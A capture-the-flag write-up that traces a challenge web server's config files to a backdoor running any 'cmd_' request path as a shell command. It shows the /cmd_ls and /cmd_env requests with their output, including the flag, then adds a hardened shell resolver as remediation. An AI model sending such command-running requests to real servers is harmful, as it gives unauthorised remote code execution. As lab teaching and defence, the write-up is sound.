Notes:

Solution:

  1. The Dockerfile shows that xinetd.conf is used. The file can simply be requested from the web server as xinetd.conf.
  2. xinetd.conf references /init.sh
  3. init.sh references /webserver.sh
  4. webserver.sh has a backdoor: for request paths starting with cmd_, it runs whatever follows the underscore as a command, as the current user.
  5. The flag can be found in the environment variables.
http://diceprectf.meatctf.com:2182/cmd_ls

Dockerfile canvasBackground.js index.html init.sh main.css star.png stars.js webserver.sh xinetd.conf

http://diceprectf.meatctf.com:2182/cmd_env

SHELL=/bin/sh REMOTE_HOST=93.209.73.130 SUDO_GID=0 HOSTNAME=288e8c33244a SUDO_COMMAND=./webserver.sh SUDO_USER=root PWD=/app LOGNAME=pleb HOME=/root FLAG=flag{w3b53rv3r_b4ckd00r} TERM=unknown USER=pleb SHLVL=0 _STDBUF_E=0 _STDBUF_I=0 _STDBUF_O=0 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin SUDO_UID=0 OLDPWD=/ _=/usr/bin/env

Flag:

flag{w3b53rv3r_b4ckd00r}

Remediation:

  • Do not implement backdoors. Not even if the source is not public.
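The safe counterpart to the webserver.sh dispatch described in step 4 is a resolver that maps a request path onto a static file and nothing else, so a cmd_ path is just an unknown file name. The following is an added example written for this writeup, not the challenge's webserver.sh; the DOCROOT directory and the allowlisted extensions are assumptions.

```shell
#!/bin/sh
# Hypothetical hardened request-path resolver for a shell-script web server
# (added example; not the challenge's webserver.sh). It does one thing:
# map a request path onto a static file under DOCROOT, or refuse. There is
# no command dispatch, so "cmd_*" is treated like any other unknown name.
# Assumption: static assets live in DOCROOT, apart from scripts and config.
DOCROOT="${DOCROOT:-/app/public}"

# resolve_path REQUEST_PATH
# Prints the file to serve, or DENY. Run this after any URL decoding so an
# encoded ".." cannot slip past the traversal check. Exit status is always 0
# so callers can use the printed value directly.
resolve_path() {
    p="${1#/}"          # drop the leading slash
    p="${p%%\?*}"       # drop any query string
    if [ -z "$p" ]; then
        p="index.html"
    fi
    case "$p" in
        */*|*..*|.*)    # no subdirectories, traversal, or dotfiles
            echo DENY; return 0 ;;
    esac
    case "$p" in
        *.html|*.css|*.js|*.png)
            echo "$DOCROOT/$p" ;;
        *)              # Dockerfile, *.sh, xinetd.conf, cmd_* all land here
            echo DENY ;;
    esac
    return 0
}

# Constructed sample requests, including the two used in the writeup above.
for req in / /index.html /star.png '/main.css?v=2' /cmd_ls /cmd_env \
           /xinetd.conf /webserver.sh /../init.sh; do
    printf '%-16s -> %s\n' "$req" "$(resolve_path "$req")"
done
```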